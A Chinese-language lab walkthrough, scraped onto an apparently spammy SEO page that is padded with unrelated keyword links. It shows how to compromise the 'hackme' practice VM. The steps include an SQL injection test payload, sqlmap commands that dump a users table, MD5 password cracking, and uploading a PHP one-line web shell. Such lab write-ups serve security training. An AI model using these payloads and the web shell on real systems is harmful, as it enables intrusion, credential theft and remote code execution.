当前位置: 首页 > wzjs >正文

网站动态与静态制作网站需要什么技术

网站动态与静态,制作网站需要什么技术,用http做网站隐藏端口,东平网站制作哪家好1.打开kali虚拟机和hackme靶机,都用nat模式连接 2.用kali扫描hackme靶机的ip 3.外部浏览器访问靶机IP 4.运用kali dirb命令扫描敏感文件 5.注册用户,登录 6.进入首页,发现是一个查询页面,可能存在sql注入 7.判断是否存在sql注入 …

1.打开kali虚拟机和hackme靶机,都用nat模式连接

2.用kali扫描hackme靶机的ip

3.外部浏览器访问靶机IP

4.运用kali dirb命令扫描敏感文件

5.注册用户,登录

6.进入首页,发现是一个查询页面,可能存在sql注入

7.判断是否存在sql注入

windows

windows' and 1=2#

8.bp抓搜索的包

将抓到的包保存成一个文件,在windows后面加一个*,说明这里是注入点

9.kali中使用sqlmap工具

爆破库名

sqlmap -r '1.txt' --current-db


爆破表名

sqlmap -r '1.txt' -D webapphacking --tables


打印‘users’表

sqlmap -r '1.txt' -D webapphacking -T users --dump

                         

发现有一个超级管理员用户,密码md5解密

10.登录超级管理员用户,发现文件上传

11.上传一句话木马

<?php @eval($_POST['cmd']);?>

12.访问uploads目录下,发现上传的木马

13.蚁剑连接

http://www.dtcms.com/wzjs/230973.html

相关文章:

  • 网站怎么做可以合法让别人充钱seo sem是啥
  • 网页设计与制作教程第二版机械工业出版社答案国内专业的seo机构
  • 有哪些好的网站制作公司国内能用的搜索引擎
  • 有没有做每日一图的网站河北电子商务seo
  • 怎呀做网站友情链接网站大全
  • 南通网站排名优化价格郑州seo网络推广
  • 国内b2c网站有哪些百度首页
  • 页面设置自定义wordpresshyein seo官网
  • 怎么用手机做网站服务器网站百度关键词优化
  • 怎么制作学校网站成都seo经理
  • 网站在线支付接口最新新闻热点事件及评论
  • 西昌市做网站的公司免费个人网站服务器
  • 广东快速做网站公司seo关键词seo排名公司
  • 登封市城乡建设路网站百度人气榜
  • 网站制作aqq怎么办网站平台
  • 如何在外管局网站上做a合同网站点击量统计
  • 公司网站形象口碑营销是什么意思
  • 合肥怎么做网站聊城网站推广公司
  • 做学校网站素材图片素材关键词点击工具
  • 阿里云做网站经费上海网站建设seo
  • 济南优化网站技术网站seo百度百科
  • 网站促销活动策划百度sem代运营
  • 网站运营维护合同seo关键词快速排名前三位
  • 中英文网站制作泉州seo代理计费
  • 网站前置审批查询三亚百度推广公司电话
  • 备案 手机网站北京网站提升排名
  • 上海网站建设设计公司建站平台哪个好
  • 怎么做潮牌网站外贸定制网站建设电话
  • 做配送平台网站多少钱网络运营推广具体做什么工作
  • 阿里巴巴网站做方案bt磁力在线种子搜索神器下载